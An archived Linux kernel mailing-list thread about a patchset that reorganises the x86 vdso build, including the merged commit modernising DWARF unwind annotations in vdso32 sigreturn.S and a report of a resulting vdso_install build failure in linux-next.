hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 884961618ee51307cc63ab620a0bdd710fa0b0af
Gitweb: https://git.kernel.org/tip/884961618ee51307cc63ab620a0bdd710fa0b0af
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:00 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: Remove open-coded DWARF in sigreturn.S
The vdso32 sigreturn.S contains open-coded DWARF bytecode, which
includes a hack for gdb to not try to step back to a previous call
instruction when backtracing from a signal handler.
Neither of those are necessary anymore: the backtracing issue is
handled by ".cfi_entry simple" and ".cfi_signal_frame", both of which
have been supported for a very long time now, which allows the
remaining frame to be built using regular .cfi annotations.
Add a few more register offsets to the signal frame just for good
measure.
Replace the nop on fallthrough of the system call (which should never,
ever happen) with a ud2a trap.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-7-hpa@zytor.com
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 146 +++++-------------------
arch/x86/include/asm/dwarf2.h | 1 +-
arch/x86/kernel/asm-offsets.c | 6 +-
3 files changed, 39 insertions(+), 114 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 965900c..25b0ac4 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -1,136 +1,54 @@
/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/unistd_32.h>
+#include <asm/dwarf2.h>
#include <asm/asm-offsets.h>
+.macro STARTPROC_SIGNAL_FRAME sc
+ CFI_STARTPROC simple
+ CFI_SIGNAL_FRAME
+ /* -4 as pretcode has already been popped */
+ CFI_DEF_CFA esp, \sc - 4
+ CFI_OFFSET eip, IA32_SIGCONTEXT_ip
+ CFI_OFFSET eax, IA32_SIGCONTEXT_ax
+ CFI_OFFSET ebx, IA32_SIGCONTEXT_bx
+ CFI_OFFSET ecx, IA32_SIGCONTEXT_cx
+ CFI_OFFSET edx, IA32_SIGCONTEXT_dx
+ CFI_OFFSET esp, IA32_SIGCONTEXT_sp
+ CFI_OFFSET ebp, IA32_SIGCONTEXT_bp
+ CFI_OFFSET esi, IA32_SIGCONTEXT_si
+ CFI_OFFSET edi, IA32_SIGCONTEXT_di
+ CFI_OFFSET es, IA32_SIGCONTEXT_es
+ CFI_OFFSET cs, IA32_SIGCONTEXT_cs
+ CFI_OFFSET ss, IA32_SIGCONTEXT_ss
+ CFI_OFFSET ds, IA32_SIGCONTEXT_ds
+ CFI_OFFSET eflags, IA32_SIGCONTEXT_flags
+.endm
+
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
- nop /* this guy is needed for .LSTARTFDEDLSI1 below (watch for HACK) */
ALIGN
__kernel_sigreturn:
-.LSTART_sigreturn:
- popl %eax /* XXX does this mean it needs unwind info? */
+ STARTPROC_SIGNAL_FRAME IA32_SIGFRAME_sigcontext
+ popl %eax
+ CFI_ADJUST_CFA_OFFSET -4
movl $__NR_sigreturn, %eax
int $0x80
-.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_sigreturn,.-.LSTART_sigreturn
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_sigreturn,.-__kernel_sigreturn
.globl __kernel_rt_sigreturn
.type __kernel_rt_sigreturn,@function
ALIGN
__kernel_rt_sigreturn:
-.LSTART_rt_sigreturn:
+ STARTPROC_SIGNAL_FRAME IA32_RT_SIGFRAME_sigcontext
movl $__NR_rt_sigreturn, %eax
int $0x80
-.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_rt_sigreturn,.-.LSTART_rt_sigreturn
- .previous
-
- .section .eh_frame,"a",@progbits
-.LSTARTFRAMEDLSI1:
- .long .LENDCIEDLSI1-.LSTARTCIEDLSI1
-.LSTARTCIEDLSI1:
- .long 0 /* CIE ID */
- .byte 1 /* Version number */
- .string "zRS" /* NUL-terminated augmentation string */
- .uleb128 1 /* Code alignment factor */
- .sleb128 -4 /* Data alignment factor */
- .byte 8 /* Return address register column */
- .uleb128 1 /* Augmentation value length */
- .byte 0x1b /* DW_EH_PE_pcrel|DW_EH_PE_sdata4. */
- .byte 0 /* DW_CFA_nop */
- .align 4
-.LENDCIEDLSI1:
- .long .LENDFDEDLSI1-.LSTARTFDEDLSI1 /* Length FDE */
-.LSTARTFDEDLSI1:
- .long .LSTARTFDEDLSI1-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: The dwarf2 unwind routines will subtract 1 from the
- return address to get an address in the middle of the
- presumed call instruction. Since we didn't get here via
- a call, we need to include the nop before the real start
- to make up for it. */
- .long .LSTART_sigreturn-1-. /* PC-relative start address */
- .long .LEND_sigreturn-.LSTART_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- complicated by the fact that the "CFA" is always assumed to
- be the value of the stack pointer in the caller. This means
- that we must define the CFA of this body of code to be the
- saved value of the stack pointer in the sigcontext. Which
- also means that there is no fixed relation to the other
- saved registers, which means that we must use DW_CFA_expression
- to compute their addresses. It also means that when we
- adjust the stack with the popl, we have to do it all over again. */
-
-#define do_cfa_expr(offset) \
- .byte 0x0f; /* DW_CFA_def_cfa_expression */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
- .byte 0x06; /* DW_OP_deref */ \
-1:
-
-#define do_expr(regno, offset) \
- .byte 0x10; /* DW_CFA_expression */ \
- .uleb128 regno; /* regno */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
-1:
-
- do_cfa_expr(IA32_SIGCONTEXT_sp+4)
- do_expr(0, IA32_SIGCONTEXT_ax+4)
- do_expr(1, IA32_SIGCONTEXT_cx+4)
- do_expr(2, IA32_SIGCONTEXT_dx+4)
- do_expr(3, IA32_SIGCONTEXT_bx+4)
- do_expr(5, IA32_SIGCONTEXT_bp+4)
- do_expr(6, IA32_SIGCONTEXT_si+4)
- do_expr(7, IA32_SIGCONTEXT_di+4)
- do_expr(8, IA32_SIGCONTEXT_ip+4)
-
- .byte 0x42 /* DW_CFA_advance_loc 2 -- nop; popl eax. */
-
- do_cfa_expr(IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_SIGCONTEXT_si)
- do_expr(7, IA32_SIGCONTEXT_di)
- do_expr(8, IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI1:
-
- .long .LENDFDEDLSI2-.LSTARTFDEDLSI2 /* Length FDE */
-.LSTARTFDEDLSI2:
- .long .LSTARTFDEDLSI2-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: See above wrt unwind library assumptions. */
- .long .LSTART_rt_sigreturn-1-. /* PC-relative start address */
- .long .LEND_rt_sigreturn-.LSTART_rt_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- slightly less complicated than the above, since we don't
- modify the stack pointer in the process. */
-
- do_cfa_expr(IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_si)
- do_expr(7, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_di)
- do_expr(8, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI2:
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_rt_sigreturn,.-__kernel_rt_sigreturn
.previous
diff --git a/arch/x86/include/asm/dwarf2.h b/arch/x86/include/asm/dwarf2.h
index 302e11b..09c9684 100644
--- a/arch/x86/include/asm/dwarf2.h
+++ b/arch/x86/include/asm/dwarf2.h
@@ -20,6 +20,7 @@
#define CFI_RESTORE_STATE .cfi_restore_state
#define CFI_UNDEFINED .cfi_undefined
#define CFI_ESCAPE .cfi_escape
+#define CFI_SIGNAL_FRAME .cfi_signal_frame
#ifndef BUILD_VDSO
/*
diff --git a/arch/x86/kernel/asm-offsets.c b/arch/x86/kernel/asm-offsets.c
index 25fcde5..0818168 100644
--- a/arch/x86/kernel/asm-offsets.c
+++ b/arch/x86/kernel/asm-offsets.c
@@ -63,8 +63,14 @@ static void __used common(void)
OFFSET(IA32_SIGCONTEXT_bp, sigcontext_32, bp);
OFFSET(IA32_SIGCONTEXT_sp, sigcontext_32, sp);
OFFSET(IA32_SIGCONTEXT_ip, sigcontext_32, ip);
+ OFFSET(IA32_SIGCONTEXT_es, sigcontext_32, es);
+ OFFSET(IA32_SIGCONTEXT_cs, sigcontext_32, cs);
+ OFFSET(IA32_SIGCONTEXT_ss, sigcontext_32, ss);
+ OFFSET(IA32_SIGCONTEXT_ds, sigcontext_32, ds);
+ OFFSET(IA32_SIGCONTEXT_flags, sigcontext_32, flags);
BLANK();
+ OFFSET(IA32_SIGFRAME_sigcontext, sigframe_ia32, sc);
OFFSET(IA32_RT_SIGFRAME_sigcontext, rt_sigframe_ia32, uc.uc_mcontext);
#endif
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:53 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
[stripped down the list of recipients quite a bit]
On 1/6/26 22:18, H. Peter Anvin wrote:
Lo! My daily -next builds for Fedora failed on x86_64 (other archs
worked fine). Haven't checked, but from the error message I wonder
if this might be due to the changes from this patch-set that showed
up in -next today:
+ /usr/bin/make -s 'HOSTCFLAGS=-O2 -fexceptions -g -grecord-gcc-switches -pipe -Wall -Werror=format-security -Wp,-U_FORTIFY_SOURCE,-D_FORTIFY_SOURCE=3 -Wp,-D_GLIBCXX_ASSERTIONS -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -fstack-protector-strong -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -march=x86-64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -mtls-dialect=gnu2 ' 'HOSTLDFLAGS=-Wl,-z,relro -Wl,--as-needed -Wl,-z,pack-relative-relocs -Wl,-z,now -specs=/usr/lib/rpm/redhat/redhat-hardened-ld -specs=/usr/lib/rpm/redhat/redhat-hardened-ld-errors -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -Wl,--build-id=sha1 -specs=/usr/lib/rpm/redhat/redhat-package-notes ' ARCH=x86_64 INSTALL_MOD_PATH=/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT vdso_install KERNELRELEASE=6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt
readelf: Error: 'arch/x86/entry/vdso/vdso32.so.dbg': No such file
readelf: Error: 'arch/x86/entry/vdso/vdso64.so.dbg': No such file
scripts/Makefile.vdsoinst:33: warning: overriding recipe for target '/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT/lib/modules/6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt/vdso/.build-id/.debug'
scripts/Makefile.vdsoinst:33: warning: ignoring old recipe for target '/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT/lib/modules/6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt/vdso/.build-id/.debug'
make[2]: *** No rule to make target 'arch/x86/entry/vdso/vdso32.so.dbg', needed by '/builddir/build/BUILD/kernel-6.19.0-build/BUILDROOT/lib/modules/6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64+rt/vdso/vdso32.so'. Stop.
make[1]: *** [/builddir/build/BUILD/kernel-6.19.0-build/kernel-next-20260115/linux-6.19.0-0.0.next.20260115.439.vanilla.fc44.x86_64/Makefile:1459: vdso_install] Error 2
make: *** [Makefile:256: __sub-make] Error 2
Full log:
https://download.copr.fedorainfracloud.org/results/@kernel-vanilla/next/fedora-rawhide-x86_64/10010857-next-next-all/builder-live.log.gz
Ciao, Thorsten
|
{
"author": "Thorsten Leemhuis <linux@leemhuis.info>",
"date": "Thu, 15 Jan 2026 08:00:55 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On January 14, 2026 11:00:55 PM PST, Thorsten Leemhuis <linux@leemhuis.info> wrote:
Looks like it. Specifically it looks like it needs a tweak to make vdso_install. I'll look at it in a few hours.
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Thu, 15 Jan 2026 07:00:47 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
